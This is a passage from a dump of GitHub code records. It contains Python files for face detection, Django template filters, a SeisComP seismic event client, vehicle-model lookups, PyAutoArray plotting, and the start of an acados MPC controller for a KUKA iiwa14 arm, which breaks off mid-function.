cv2.imwrite(out_dir + filename, img)\n if len(faces) > 0:\n return 1\n else:\n return 0\n except Exception as e:\n print(filename, e)\n unavailable_json.append(filename+out_dir)\n\n\ndef main():\n for file in in_files:\n with open(file, 'r') as f:\n filename = os.path.basename(file)[:-5] # only number\n try:\n dct = json.load(f)\n\n # Extract from photo\n # if dct['photo_url'] is not None:\n # if type(dct['photo_url']) is str: # single image\n # print(filename, 'has one image')\n # image_url = dct['photo_url']\n # face_present = detect_print(image_url, filename+'.png', image_out_dir)\n # elif type(dct['photo_url']) is list: # album / multiple image\n # face_present_list = []\n # print(filename, 'has multiple image')\n # for url in dct['photo_url']:\n # image_url = url\n # face_present = detect_print(image_url, filename+'-'+str(dct['photo_url'].index(url))+'.png', image_out_dir)\n # face_present_list.append(face_present)\n # new_dct = {'json_id': filename, 'face_present': face_present_list}\n # # print(new_dct)\n # list_of_dct.append(new_dct)\n\n # Extract from thumbnail\n # if dct['thumbnail_url'] is not None:\n # if 
type(dct['thumbnail_url']) is str:\n # image_url = dct['thumbnail_url']\n # face_present = detect_print(image_url, filename+'.png', tn_out_dir)\n # else:\n # print(filename, 'thumbnail is not str but [], pass')\n # new_dct = {'json_id': filename, 'face_present': face_present}\n # list_of_dct2.append(new_dct)\n\n except JSONDecodeError:\n unavailable_json.append(filename)\n\n cv2.destroyAllWindows()\n # df = pd.DataFrame(list_of_dct)\n # df.to_csv('json_face.csv', index=False)\n # df2 = pd.DataFrame(list_of_dct2)\n # df2.to_csv('json_tn_face.csv', index=False)\n\n print(unavailable_json)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","repo_name":"sklisa/master-modeler2021","sub_path":"FeaturePrep0314.py","file_name":"FeaturePrep0314.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44593989074","text":"#board index 정렬\nfrom django import template\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import linebreaksbr\n\nregister = template.Library()\n\n@register.filter\ndef sub(value, arg):\n return value - arg\n\n@register.filter\ndef custom_linebreaksbr(value, arg):\n new_value = \"\"\n count = 0\n for char in value:\n new_value += char\n count += 1\n if count % arg == 0:\n new_value += \"\\n\"\n return mark_safe(linebreaksbr(new_value))","repo_name":"KrswJo/aivle_ai_3rd_13th_big","sub_path":"board/templatetags/board_filter.py","file_name":"board_filter.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22658596581","text":"from __future__ import print_function\nimport sys\nfrom seiscomp.core import Time, TimeSpan\nfrom seiscomp.client import Application\nfrom seiscomp.datamodel import Event, Origin, Magnitude, PublicObject, FocalMechanism\nfrom seiscomp.communication import Protocol \nimport seiscomp.logging\n\ninfo = seiscomp.logging.info\ndebug = seiscomp.logging.info # XXX\nwarning = seiscomp.logging.warning\nerror = seiscomp.logging.error\n\n\n# Compound event with preferred origin/magnitude on board as well as some relevant state variables\nclass EventState:\n __slots__ = (\"event\", \"origin\", \"magnitude\", \"focalmechanism\", \"preferredOriginID\", \"preferredMagnitudeID\", \"preferredFocalMechanismID\")\n\n def __init__(self, evt=None):\n self.event = evt\n self.origin = None\n self.magnitude = None\n self.focalmechanism = None\n self.preferredOriginID = None\n self.preferredMagnitudeID = None\n self.preferredFocalMechanismID = None\n\n\nclass EventClient(Application):\n\n def __init__(self, argc, argv):\n Application.__init__(self, argc, argv)\n self.setMessagingEnabled(True)\n self.setDatabaseEnabled(True, True)\n self.addMessagingSubscription(\"EVENT\")\n self.addMessagingSubscription(\"LOCATION\")\n self.addMessagingSubscription(\"MAGNITUDE\")\n self.addMessagingSubscription(\"FOCMECH\")\n self.setAutoApplyNotifierEnabled(True)\n\n # object buffers\n self._state = {}\n self._origin = {}\n self._magnitude = {}\n self._focalmechanism = {}\n\n self._cleanupCounter = 0\n self._xdebug = False\n self._cleanup_interval = 3600.\n\n\n def cleanup(self):\n self._cleanupCounter += 1\n if self._cleanupCounter < 5:\n return\n debug(\"before cleanup:\")\n debug(\" _state %d\" % len(self._state))\n debug(\" _origin %d\" % len(self._origin))\n debug(\" _magnitude %d\" % len(self._magnitude))\n debug(\" _focalmechanism %d\" % 
len(self._focalmechanism))\n debug(\" public object count %d\" % (PublicObject.ObjectCount()))\n # we first remove those origins and magnitudes, which are\n # older than one hour and are not preferred anywhere.\n limit = Time.GMT() + TimeSpan(-self._cleanup_interval)\n\n originIDs = self._origin.keys()\n for oid in originIDs:\n if self._origin[oid].creationInfo().creationTime() < limit:\n del self._origin[oid]\n\n magnitudeIDs = self._magnitude.keys()\n for oid in magnitudeIDs:\n if self._magnitude[oid] is None:\n # This should actually never happen!\n error(\"Magnitude %s is None!\" % oid)\n del self._magnitude[oid]\n continue\n if self._magnitude[oid].creationInfo().creationTime() < limit:\n del self._magnitude[oid]\n\n focalmechanismIDs = self._focalmechanism.keys()\n for oid in focalmechanismIDs:\n if self._focalmechanism[oid].creationInfo().creationTime() < limit:\n del self._focalmechanism[oid]\n\n # finally remove all remaining objects older than two hours\n limit = Time.GMT() + TimeSpan(-2*self._cleanup_interval)\n to_delete = []\n for evid in self._state:\n org = self._state[evid].origin\n if org and org.time().value() > limit:\n continue # nothing to do with this event\n to_delete.append(evid)\n for evid in to_delete:\n del self._state[evid]\n\n debug(\"After cleanup:\")\n debug(\" _state %d\" % len(self._state))\n debug(\" _origin %d\" % len(self._origin))\n debug(\" _magnitude %d\" % len(self._magnitude))\n debug(\" _focalmechanism %d\" % len(self._focalmechanism))\n debug(\" public object count %d\" % (PublicObject.ObjectCount()))\n debug(\"-------------------------------\")\n self._cleanupCounter = 0\n\n\n def changed_origin(self, event_id, previous_id, current_id):\n # to be implemented in a derived class\n raise NotImplementedError\n\n\n def changed_magnitude(self, event_id, previous_id, current_id):\n # to be implemented in a derived class\n raise NotImplementedError\n\n\n def changed_focalmechanism(self, event_id, previous_id, current_id):\n # to be implemented in a derived class\n raise NotImplementedError\n\n\n def _get_origin(self, oid):\n if oid not in self._origin:\n self._load_origin(oid)\n if oid in self._origin:\n return self._origin[oid]\n\n\n def _get_magnitude(self, oid):\n if oid not in self._magnitude:\n self._load_magnitude(oid)\n if oid in self._magnitude:\n return self._magnitude[oid]\n\n\n def _get_focalmechanism(self, oid):\n if oid not in self._focalmechanism:\n self._load_focalmechanism(oid)\n if oid in self._focalmechanism:\n return self._focalmechanism[oid]\n\n\n def _load(self, oid, tp):\n assert oid is not None\n debug(\"trying to load %s %s\" % (str(tp), oid))\n tmp = tp.Cast(self.query().loadObject(tp.TypeInfo(), oid))\n if tmp:\n debug(\"loaded %s %s\" % (tmp.ClassName(), oid))\n return tmp\n\n\n def _load_event(self, oid):\n evt = self._load(oid, Event)\n self._state[oid] = EventState(evt)\n # if we do this here, then we override the preferred* here and are not able to detect the difference!\n self._state[oid].origin = self._get_origin(evt.preferredOriginID())\n self._state[oid].magnitude = self._get_magnitude(evt.preferredMagnitudeID())\n self._state[oid].focalmechanism = self._get_focalmechanism(evt.preferredFocalMechanismID())\n\n\n def _load_origin(self, oid):\n self._origin[oid] = self._load(oid, Origin)\n\n\n def _load_magnitude(self, oid):\n self._magnitude[oid] = self._load(oid, Magnitude)\n\n\n def _load_focalmechanism(self, oid):\n obj = self._load(oid, FocalMechanism)\n if obj:\n self._focalmechanism[oid] = obj\n 
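# note: uses warning() rather than debug(), presumably so successful focal-mechanism loads stay visible in default logs\n 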
warning(\"focalmechanism ID %s\" % obj.publicID())\n else:\n warning(\"focalmechanism is None\")\n\n\n def _process_event(self, evt):\n evid = evt.publicID()\n\n if self._xdebug:\n debug(\"_process_event %s start\" % evid)\n\n st = self._state[evid]\n previous_preferredOriginID = st.preferredOriginID\n previous_preferredMagnitudeID = st.preferredMagnitudeID\n previous_preferredFocalMechanismID = st.preferredFocalMechanismID\n\n # possibly updated preferredOriginID/preferredMagnitudeID\n preferredOriginID = evt.preferredOriginID()\n preferredMagnitudeID = evt.preferredMagnitudeID()\n preferredFocalMechanismID = evt.preferredFocalMechanismID()\n if not preferredOriginID:\n preferredOriginID = None\n if not preferredMagnitudeID:\n preferredMagnitudeID = None\n if not preferredFocalMechanismID:\n preferredFocalMechanismID = None\n\n info(\"%s preferredOriginID %s %s\" % (evid, previous_preferredOriginID, preferredOriginID))\n info(\"%s preferredMagnitudeID %s %s\" % (evid, previous_preferredMagnitudeID, preferredMagnitudeID))\n info(\"%s preferredFocalMechanismID %s %s\" % (evid, previous_preferredFocalMechanismID, preferredFocalMechanismID))\n\n\n # Test whether there have been any (for us!) relevant\n # changes in the event. We test for preferredOriginID,\n # preferredMagnitudeID and preferredFocalMechanismID\n if preferredOriginID is not None and preferredOriginID != previous_preferredOriginID:\n st.origin = self._get_origin(preferredOriginID)\n self.changed_origin(evid, previous_preferredOriginID, preferredOriginID)\n st.preferredOriginID = preferredOriginID\n\n if preferredMagnitudeID is not None and preferredMagnitudeID != previous_preferredMagnitudeID:\n st.magnitude = self._get_magnitude(preferredMagnitudeID)\n self.changed_magnitude(evid, previous_preferredMagnitudeID, preferredMagnitudeID)\n st.preferredMagnitudeID = preferredMagnitudeID\n\n if preferredFocalMechanismID is not None and preferredFocalMechanismID != previous_preferredFocalMechanismID:\n st.focalmechanism = self._get_focalmechanism(preferredFocalMechanismID)\n self.changed_focalmechanism(evid, previous_preferredFocalMechanismID, preferredFocalMechanismID)\n st.preferredFocalMechanismID = preferredFocalMechanismID\n\n self.cleanup()\n\n if self._xdebug:\n debug(\"_process_event %s end\" % evid)\n\n\n def _process_origin(self, obj):\n# self.cleanup()\n pass # currently nothing to do here\n\n\n def _process_magnitude(self, obj):\n# self.cleanup()\n pass # currently nothing to do here\n\n\n def _process_focalmechanism(self, obj):\n# self.cleanup()\n pass # currently nothing to do here\n\n\n def updateObject(self, parentID, updated):\n # called if an updated object is received\n for tp in [ Magnitude, Origin, Event, FocalMechanism ]:\n # try to convert to any of the above types\n obj = tp.Cast(updated)\n if obj:\n break\n\n if not obj:\n return\n\n oid = obj.publicID()\n\n if self._xdebug:\n debug(\"updateObject start %s oid=%s\" % (obj.ClassName(), oid))\n\n # our utility may have been offline during addObject, so we\n # need to check whether this is the first time that we see\n # this object. 
If that is the case, we load that object from\n # the database in order to be sure that we are working with\n # the complete object.\n if tp is Event:\n if oid in self._state:\n # *update* the existing instance - do *not* overwrite it!\n self._state[oid].event.assign(obj)\n else:\n self._load_event(oid)\n self._process_event(obj)\n\n elif tp is Origin:\n if oid in self._origin:\n # *update* the existing instance - do *not* overwrite it!\n self._origin[oid].assign(obj)\n else:\n self._load_origin(oid)\n self._process_origin(obj)\n\n elif tp is Magnitude:\n if oid in self._magnitude:\n # *update* the existing instance - do *not* overwrite it!\n self._magnitude[oid].assign(obj)\n else:\n self._load_magnitude(oid)\n self._process_magnitude(obj)\n\n elif tp is FocalMechanism:\n if oid in self._focalmechanism:\n # *update* the existing instance - do *not* overwrite it!\n self._focalmechanism[oid].assign(obj)\n else:\n self._load_focalmechanism(oid)\n self._process_focalmechanism(obj)\n\n if self._xdebug:\n debug(\"updateObject end\")\n\n\n def addObject(self, parentID, added):\n # called if a new object is received\n for tp in [ Magnitude, Origin, Event, FocalMechanism ]:\n obj = tp.Cast(added)\n if obj:\n break\n\n if not obj:\n return\n\n oid = obj.publicID()\n\n if self._xdebug:\n debug(\"addObject start %s oid=%s\" % (obj.ClassName(), oid))\n\n tmp = PublicObject.Find(oid)\n if not tmp:\n error(\"PublicObject.Find failed on %s %s\" % (tmp.ClassName(), oid))\n return\n # can we get rid of this?\n tmp = tp.Cast(tmp)\n tmp.assign(obj)\n obj = tmp\n\n if tp is Event:\n if oid not in self._state:\n self._state[oid] = EventState(obj)\n self._state[oid].origin = self._get_origin(obj.preferredOriginID())\n self._state[oid].magnitude = self._get_magnitude(obj.preferredMagnitudeID())\n else:\n error(\"event %s already in self._state\" % oid)\n self._process_event(obj)\n\n elif tp is Origin:\n if oid not in self._origin:\n self._origin[oid] = obj\n else:\n error(\"origin %s already in self._origin\" % oid)\n self._process_origin(obj)\n\n elif tp is Magnitude:\n if oid not in self._magnitude:\n self._magnitude[oid] = obj\n else:\n error(\"magnitude %s already in self._magnitude\" % oid)\n self._process_magnitude(obj)\n\n elif tp is FocalMechanism:\n if oid not in self._focalmechanism:\n self._focalmechanism[oid] = obj\n else:\n error(\"focalmechanism %s already in self._focalmechanism\" % oid)\n self._process_focalmechanism(obj)\n\n if self._xdebug:\n debug(\"addObject end\")\n\n\nclass EventWatch(EventClient):\n\n def __init__(self, argc, argv):\n EventClient.__init__(self, argc, argv)\n\n def _print(self, evid):\n s = self._state[evid]\n org = s.origin\n mag = s.magnitude\n foc = s.focalmechanism\n print(\"EVT %s\" % evid)\n if not org:\n return\n print(\"ORG %s\" % (org.time().value()))\n if not mag:\n return\n print(\"MAG %.2f %s\" % (mag.magnitude().value(), mag.type()))\n if not foc:\n return\n nmt = foc.momentTensorCount()\n print(\"FOC %d\" % (nmt))\n\n try:\n print(\" misfit: %.3f\" % (mt.misfit()))\n except:\n pass\n\n try:\n print(\" azigap: %.1f\" % (mt.azimuthalGap()))\n except:\n pass\n \n for i in range(foc.momentTensorCount()):\n mt = foc.momentTensor(i)\n try:\n print(\" clvd %.2f\" % (mt.clvd()))\n except:\n pass\n try:\n print(\" iso %.2f\" % (mt.iso()))\n except:\n pass\n# print(\" %s\" % (mt.momentMagnitudeID()))\n mw = Magnitude.Find(mt.momentMagnitudeID())\n mw = Magnitude.Cast(mw)\n if mw:\n print(\" MW %.2f %s\" % (mw.magnitude().value(), mw.type()))\n# print(\" dataUsedCount 
%d\" % mt.dataUsedCount())\n totalStationWeight = 0.\n totalComponentWeight = 0.\n for k in range(mt.momentTensorStationContributionCount()):\n sc = mt.momentTensorStationContribution(k)\n totalStationWeight += sc.weight()\n for j in range(sc.momentTensorComponentContributionCount()):\n cc = sc.momentTensorComponentContribution(j)\n totalComponentWeight += cc.weight()\n print(\" stationContribution %.2f\" % totalStationWeight)\n print(\" componentContribution %.2f\" % totalComponentWeight)\n\n # this could be the centroid location\n dorg = Origin.Find(mt.derivedOriginID())\n if dorg:\n print(\" time %s\" % (dorg.time().value()))\n print(\" lat %.2f\" % dorg.latitude().value())\n print(\" lon %.2f\" % dorg.longitude().value())\n print(\" dep %.1f\" % dorg.depth().value())\n else:\n print(\" no origin found for derivedOriginID() '%s'\" % mt.derivedOriginID())\n\n def changed_origin(self, event_id, previous_id, current_id):\n debug(\"EventWatch.changed_origin\")\n debug(\"event %s: CHANGED preferredOriginID\" % event_id)\n debug(\" from %s\" % previous_id)\n debug(\" to %s\" % current_id)\n self._print(event_id)\n\n def changed_magnitude(self, event_id, previous_id, current_id):\n debug(\"EventWatch.changed_magnitude\")\n debug(\"event %s: CHANGED preferredMagnitudeID\" % event_id)\n debug(\" from %s\" % previous_id)\n debug(\" to %s\" % current_id)\n self._print(event_id)\n\n def changed_focalmechanism(self, event_id, previous_id, current_id):\n debug(\"EventWatch.changed_focalmechanism\")\n debug(\"event %s: CHANGED preferredFocalMechanismID\" % event_id)\n debug(\" from %s\" % previous_id)\n debug(\" to %s\" % current_id)\n self._print(event_id)\n\nif __name__ == \"__main__\":\n app = EventWatch(len(sys.argv), sys.argv)\n sys.exit(app())\n\n","repo_name":"jsaul/sc3stuff","sub_path":"messaging/event-client/eventclient.py","file_name":"eventclient.py","file_ext":"py","file_size_in_byte":16484,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"24705162104","text":"#\r\nfrom apps.dcl.mdl.m_bmy import MBmy\r\nfrom apps.dcl.mdl.m_bm import MBm\r\n\r\nclass CWxs(object):\r\n def _init__(self):\r\n self.refl = ''\r\n\r\n @staticmethod\r\n def get_bmy_id_bm_vo_dict():\r\n '''\r\n 获取bmy_id(年款头输出)与车型值对象的字典\r\n '''\r\n bmy_id_bm_vo_dict = {}\r\n bmy_id_model_ids = MBmy.get_bmy_id_model_ids()\r\n for bimi in bmy_id_model_ids:\r\n bmy_id = int(bimi['bmy_id'])\r\n model_id = int(bimi['model_id'])\r\n model_vo = MBm.get_model_vo_by_id(model_id)\r\n bm_vo = {\r\n 'model_id': model_id,\r\n 'model_name': model_vo['model_name'],\r\n 'model_code': model_vo['model_code'],\r\n 'source_type': model_vo['source_type']\r\n }\r\n bmy_id_bm_vo_dict[bmy_id] = bm_vo\r\n return bmy_id_bm_vo_dict","repo_name":"yt7589/cvep","sub_path":"apps/dcl/controller/c_wxs.py","file_name":"c_wxs.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11703945664","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom typing import Union\r\n\r\nfrom autoarray.plot.wrap.two_d.abstract import AbstractMatWrap2D\r\nfrom autoarray.plot.wrap.base.units import Units\r\nfrom autoarray.inversion.pixelization.mappers.voronoi import MapperVoronoiNoInterp\r\nfrom autoarray.inversion.pixelization.mappers.voronoi import MapperVoronoi\r\nfrom autoarray.inversion.pixelization.mappers.delaunay import MapperDelaunay\r\n\r\nfrom autoarray.plot.wrap import base as wb\r\n\r\n\r\nclass 
InterpolatedReconstruction(AbstractMatWrap2D):\r\n \"\"\"\r\n Given a `Mapper` and a corresponding array of `pixel_values` (e.g. the reconstruction values of a Delaunay\r\n triangulation) plot the values using `plt.imshow()`.\r\n\r\n The `pixel_values` are an ndarray of values which correspond to the irregular pixels of the mesh (e.g. for\r\n a Delaunay triangulation they are the connecting corners of each triangle or Voronoi mesh). This cannot be plotted\r\n with `imshow()`, therefore this class first converts the `pixel_values` from this irregular grid to a uniform 2D\r\n array of square pixels via interpolation.\r\n\r\n The interpolation routine depends on the `Mapper`, with most mappers having their own built-in interpolation\r\n routine specific to that pixelization's mesh.\r\n\r\n This object wraps methods described in below:\r\n\r\n - plt.imshow: https://matplotlib.org/3.3.2/api/_as_gen/matplotlib.pyplot.imshow.html\r\n \"\"\"\r\n\r\n def imshow_reconstruction(\r\n self,\r\n mapper: Union[MapperDelaunay, MapperVoronoiNoInterp, MapperVoronoi],\r\n pixel_values: np.ndarray,\r\n units: Units,\r\n cmap: wb.Cmap,\r\n colorbar: wb.Colorbar,\r\n colorbar_tickparams: wb.ColorbarTickParams = None,\r\n aspect=None,\r\n ax=None,\r\n ):\r\n \"\"\"\r\n Given a `Mapper` and a corresponding array of `pixel_values` (e.g. the reconstruction values of a Delaunay\r\n triangulation) plot the values using `plt.imshow()`.\r\n\r\n The `pixel_values` are an ndarray of values which correspond to the irregular pixels of the mesh (e.g. for\r\n a Delaunay triangulation they are the connecting corners of each triangle or Voronoi mesh). This cannot be plotted\r\n with `imshow()`, therefore this class first converts the `pixel_values` from this irregular grid to a uniform 2D\r\n array of square pixels via interpolation.\r\n\r\n The interpolation routine depends on the `Mapper`, with most mappers having their own built-in interpolation\r\n routine specific to that pixelization's mesh.\r\n\r\n This object wraps methods described in below:\r\n\r\n - plt.imshow: https://matplotlib.org/3.3.2/api/_as_gen/matplotlib.pyplot.imshow.html\r\n\r\n Parameters\r\n ----------\r\n mapper\r\n An object which contains a 2D mesh (e.g. Voronoi mesh cells) and defines how to\r\n interpolate values from the pixelization's mesh.\r\n pixel_values\r\n The pixel values of the pixelization's mesh (e.g. a Voronoi mesh) which are interpolated to a uniform square\r\n array for plotting with `imshow()`.\r\n cmap\r\n The colormap used by `imshow()` to plot the pixelization's mesh values.\r\n colorbar\r\n The `Colorbar` object in `mat_base` used to set the colorbar of the figure the interpolated pixelization's mesh\r\n values (e.g. 
values interpolated from the Voronoi mesh) are plotted on.\r\n colorbar_tickparams\r\n Controls the tick parameters of the colorbar.\r\n \"\"\"\r\n\r\n if pixel_values is None:\r\n return\r\n\r\n vmin = cmap.vmin_from(array=pixel_values)\r\n vmax = cmap.vmax_from(array=pixel_values)\r\n\r\n color_values = np.where(pixel_values > vmax, vmax, pixel_values)\r\n color_values = np.where(pixel_values < vmin, vmin, color_values)\r\n\r\n cmap = plt.get_cmap(cmap.cmap)\r\n\r\n if colorbar is not None:\r\n colorbar = colorbar.set_with_color_values(\r\n units=units, cmap=cmap, color_values=color_values, ax=ax\r\n )\r\n if colorbar is not None and colorbar_tickparams is not None:\r\n colorbar_tickparams.set(cb=colorbar)\r\n\r\n interpolation_array = mapper.interpolated_array_from(values=pixel_values)\r\n\r\n plt.imshow(\r\n X=interpolation_array.native,\r\n cmap=cmap,\r\n extent=mapper.source_plane_mesh_grid.geometry.extent_square,\r\n aspect=aspect,\r\n )\r\n\r\n return interpolation_array\r\n","repo_name":"Jammy2211/PyAutoArray","sub_path":"autoarray/plot/wrap/two_d/interpolated_reconstruction.py","file_name":"interpolated_reconstruction.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"37781139217","text":"\nfrom typing import TYPE_CHECKING, Tuple\nfrom acados_template import AcadosOcp, AcadosOcpSolver, AcadosSimSolver\nimport numpy as np\nfrom tempfile import mkdtemp\nimport scipy\n# from optimal_planner import design_optimal_circular_trajectory\nfrom scipy.interpolate import interp1d\nimport sys\nimport os\nproject_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(project_root)\nfrom model.iiwa14_model import Symbolic_model\n\n\"\"\"\nwhen it is used for the calculation of circle trajectory\nQ_q = 1e7, Q_dq = 1e3, Q_qe = 1e7, Q_dqe = 1e3,\nself.nlp_solver_max_iter : int = 100\nself.P = np.diagflat(np.array([1]*3))* 3e7\nself.Pn = np.diagflat(np.array([1]*3))* 1e7\n\"\"\" \n\n\"\"\"\nwhen it is used for the calculation of single point\nQ_q = 0.1, Q_dq = 0.01, Q_qe = 5e2, Q_dqe = 5e1,\nself.nlp_solver_max_iter : int = 50\nself.P = np.diagflat(np.array([1]*3))* 3e3\nself.Pn = np.diagflat(np.array([1]*3))* 1e4\n\"\"\"\n\n\"\"\"\nwhen it is used for the expert data generation( DT ==0.05)\nQ_q = 0.1, Q_dq = 5e1, Q_qe = 5e2, Q_dqe = 5e1,\nself.nlp_solver_max_iter : int = 100\nself.P = np.diagflat(np.array([1]*3))* 3e3\nself.Pn = np.diagflat(np.array([1]*3))* 1e4\n\"\"\"\n\n# define penalty element of Q for state x \nQ_q = 0.1\nQ_dq = 0.01\n# define penalty element of Qn for terminal state x\nQ_qe = 5e2\nQ_dqe = 5e1\n\nclass MpcOptions:\n def __init__(self, tf: float=2, n: int=30) -> None:\n self.n : int = n\n self.tf : float = tf\n self.nlp_solver_max_iter : int = 50\n self.condensing_relative: float=1\n # define the wall constraint\n self.wall_0deg_constraint_on: bool = True\n self.wall_axis: int = 1\n self.wall_value: float = 0.4\n self.wall_pos_side: bool = False\n self.wall_30deg_constraint_on: bool = False\n # define the penalty matrices Q R and P\n self.Q = np.diagflat(np.array([[Q_q]*7 + [Q_dq]*7]))\n self.R = np.diagflat(np.array([0.001]*7))\n self.P = np.diagflat(np.array([1]*3))* 3e3\n self.Qn = np.diagflat(np.array([[Q_qe]*7 + [Q_dqe]*7]))\n self.Pn = np.diagflat(np.array([1]*3))* 1e4\n self.speed_slack: float = 1e6\n self.wall_slack: float = 1e4\n \n def get_sample_time(self) -> float:\n return self.tf/self.n\n \nclass MPC:\n def __init__(self, model: 
\"Symbolic_model\", \n x0: np.ndarray = None, pee_0: np.ndarray = None,\n options: MpcOptions = MpcOptions()) -> None:\n \n # x0, pee_0 column vector 2D array\n \n # this x0 and pee_0 are only used to initialize the controller,\n if x0 is None:\n x0 = np.zeros(model.nx,1)\n if pee_0 is None:\n pee_0 = np.zeros(3,1)\n \n # initialize the MPC conditions\n self.tau_max = model.tau_max\n self.dq_max = model.dq_max\n self.dymodel = model\n mpcmodel, constraint_expr = model.get_acados_model()\n self.model = mpcmodel\n self.options = options\n self.iteration_conuter = 0\n self.debug_time = []\n \n # initialize the parameter for circle trajectory\n self.inter_t2q = None\n self.inter_t2dq = None\n self.inter_pee = None\n \n # create ocp project to formulate the OCP optimal control problem\n ocp = AcadosOcp()\n ocp.model = mpcmodel\n ocp.dims.N = options.n\n ocp.code_export_directory = mkdtemp()\n \n # OCP parameters\n nx = self.dymodel.nx\n nu = self.dymodel.nu\n nz = self.dymodel.nz\n ny = nx + nu + nz\n ny_e = nx + nz\n self.nu = nu\n self.nx = nx\n \n # dimension check\n assert (nx == options.Q.shape[0] == options.Qn.shape[0])\n assert (nu == options.R.shape[0])\n assert (nz == options.P.shape[0] == options.Pn.shape[0])\n \n # set cost module\n ocp.cost.cost_type = 'LINEAR_LS'\n ocp.cost.cost_type_e = 'LINEAR_LS'\n \n ocp.cost.W = scipy.linalg.block_diag(options.Q, options.R, options.P)\n ocp.cost.W_e = scipy.linalg.block_diag(options.Qn, options.Pn)\n \n ocp.cost.Vx = np.zeros((ny, nx))\n ocp.cost.Vx[:nx, :] = np.eye(nx)\n \n ocp.cost.Vu = np.zeros((ny, nu))\n ocp.cost.Vu[nx:nx+nu, :] = np.eye(nu)\n \n ocp.cost.Vz = np.zeros((ny, nz))\n ocp.cost.Vz[nx+nu:, :] = np.eye(nz)\n \n ocp.cost.Vx_e = np.zeros((ny_e, nx))\n ocp.cost.Vx_e[:nx, :] = np.eye(nx)\n \n ocp.cost.Vz_e = np.zeros((ny_e, nz))\n ocp.cost.Vz_e[nx:, :] = np.eye(nz)\n \n goal_x = x0\n goal_cartesian = pee_0\n ocp.cost.yref = np.vstack((goal_x, np.zeros((nu,1)), goal_cartesian)).flatten()\n ocp.cost.yref_e = np.vstack((goal_x, goal_cartesian)).flatten()\n # the reference is only used to initialize the solver, there is a function to set the reference point\n \n # set constraints\n ocp.constraints.constr_type = 'BGH'\n ocp.constraints.x0 = x0.reshape((nx,))\n \n # define the bound for the control input u\n # idxbu: index of soft bounds on control inputs\n ocp.constraints.lbu = - self.tau_max\n ocp.constraints.ubu = self.tau_max\n ocp.constraints.idxbu = np.arange(nu)\n \n # define the bound for the state x(7,14)\n ocp.constraints.lbx = - self.dq_max\n ocp.constraints.ubx = self.dq_max\n ocp.constraints.idxbx = np.arange(7,14)\n \n ocp.constraints.lbx_e = - self.dq_max\n ocp.constraints.ubx_e = self.dq_max\n ocp.constraints.idxbx_e = np.arange(7,14)\n ocp.constraints.idxsbx = np.arange(7,14) \n \n # set constraints for the wall\n if options.wall_0deg_constraint_on:\n ocp.model.con_h_expr = constraint_expr[options.wall_axis]\n n_wall_constraints = 1\n ns = n_wall_constraints\n nsh = n_wall_constraints\n self.current_slacks = np.zeros((ns,))\n # define the penalty matrix for the slack variable\n ocp.cost.zl = np.array([1e3]*7+[1e4]*n_wall_constraints)\n ocp.cost.Zl = np.array([options.speed_slack]*7+[options.wall_slack]*n_wall_constraints)\n ocp.cost.zu = ocp.cost.zl\n ocp.cost.Zu = ocp.cost.Zl\n # define the bounds for the inequality constraints\n ocp.constraints.lh = np.ones((n_wall_constraints,))* (options.wall_value if options.wall_pos_side else -1e3)\n ocp.constraints.uh = np.ones((n_wall_constraints,))* (options.wall_value if not 
options.wall_pos_side else 1e3)\n # define the bounds on slacks corresponding to soft lower and upper bounds for nonlinear inequalities\n ocp.constraints.lsh = np.zeros(nsh)\n ocp.constraints.ush = np.zeros(nsh)\n # indices of soft nonlinear constraints within the indices of nonlinear constraints\n ocp.constraints.idxsh = np.array(range(n_wall_constraints))\n elif options.wall_30deg_constraint_on:\n ocp.model.con_h_expr = 0.577* constraint_expr[0]- constraint_expr[1] - 2.485\n n_wall_constraints = 1\n ns = n_wall_constraints\n nsh = n_wall_constraints\n self.current_slacks = np.zeros((ns,))\n # define the penalty matrix for the slack variable\n ocp.cost.zl = np.array([1e3]*7+[1e4]*n_wall_constraints)\n ocp.cost.Zl = np.array([options.speed_slack]*7+[options.wall_slack]*n_wall_constraints)\n ocp.cost.zu = ocp.cost.zl\n ocp.cost.Zu = ocp.cost.Zl\n # define the bounds for the inequality constraints\n ocp.constraints.lh = np.zeros((n_wall_constraints,))\n ocp.constraints.uh = np.ones((n_wall_constraints,))*1e3\n # define the bounds on slacks corresponding to soft lower and upper bounds for nonlinear inequalities\n ocp.constraints.lsh = np.zeros(nsh)\n ocp.constraints.ush = np.zeros(nsh)\n # indices of soft nonlinear constraints within the indices of nonlinear constraints\n ocp.constraints.idxsh = np.array(range(n_wall_constraints))\n \n else: \n ocp.cost.zl = np.array(([0]*7))\n ocp.cost.zu = np.array(([0]*7))\n ocp.cost.Zl = np.array([options.speed_slack]*7)\n ocp.cost.Zu = np.array([options.speed_slack]*7)\n \n # solver options\n ocp.solver_options.qp_solver = 'PARTIAL_CONDENSING_HPIPM' # FULL_CONDENSING_QPOASES # PARTIAL_CONDENSING_HPIPM\n ocp.solver_options.qp_solver_cond_N = int(options.n * options.condensing_relative)\n ocp.solver_options.hessian_approx = 'GAUSS_NEWTON'\n ocp.solver_options.integrator_type = 'IRK'\n ocp.solver_options.nlp_solver_type = 'SQP' # SQP_RTI, SQP\n ocp.solver_options.nlp_solver_max_iter = options.nlp_solver_max_iter\n\n ocp.solver_options.sim_method_num_stages = 2\n ocp.solver_options.sim_method_num_steps = 2\n ocp.solver_options.qp_solver_cond_N = options.n\n\n # set prediction horizon\n ocp.solver_options.tf = options.tf\n\n self.acados_ocp_solver = AcadosOcpSolver(ocp, json_file='acados_ocp_' + 'iiwa14' + '.json')\n # the reason for creating an OCP before creating the solver is to seperate the problem formulation from the numerical optimization process\n \n def reset(self) -> None:\n self.debug_time = []\n self.iteration_conuter = 0\n \n def set_reference_point(self, x_ref: np.ndarray, 